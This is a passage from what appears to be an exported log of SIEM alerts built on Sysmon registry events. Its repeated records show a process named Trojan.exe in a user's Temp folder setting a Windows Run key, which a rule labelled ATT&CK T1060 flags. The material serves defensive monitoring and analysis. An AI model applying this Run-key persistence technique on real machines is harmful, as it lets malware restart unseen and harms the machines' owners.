HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:39.158"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:51.318",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:38.080 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:38.092608500Z"",""eventRecordID"":""1527"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:38.080\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:38.080"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:22:50.185",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:37.064 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:37.076546700Z"",""eventRecordID"":""1525"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:37.064\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:25:37.064"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:49.224",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:36.049 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:36.057247000Z"",""eventRecordID"":""1524"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:36.049\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:36.049"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:48.164",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:35.017 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:35.020292700Z"",""eventRecordID"":""1522"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:35.017\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:35.017"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:22:47.117",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:34.002 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:34.004832800Z"",""eventRecordID"":""1521"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:34.002\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:25:34.002"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:46.099",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:32.971 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:32.975047000Z"",""eventRecordID"":""1520"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:32.971\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:32.971"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:45.084",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:31.956 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:31.974800300Z"",""eventRecordID"":""1511"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:31.956\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:31.956"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:22:44.087",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:30.939 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:30.941294000Z"",""eventRecordID"":""1498"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:30.939\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:25:30.939"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:43.081",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:29.924 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:29.927102300Z"",""eventRecordID"":""1496"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:29.924\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:29.924"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:22:42.021",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:28.908 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:28.919034300Z"",""eventRecordID"":""1495"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:28.908\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:28.908"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:22:41.021",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:27.893 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:27.900850800Z"",""eventRecordID"":""1494"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:27.893\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 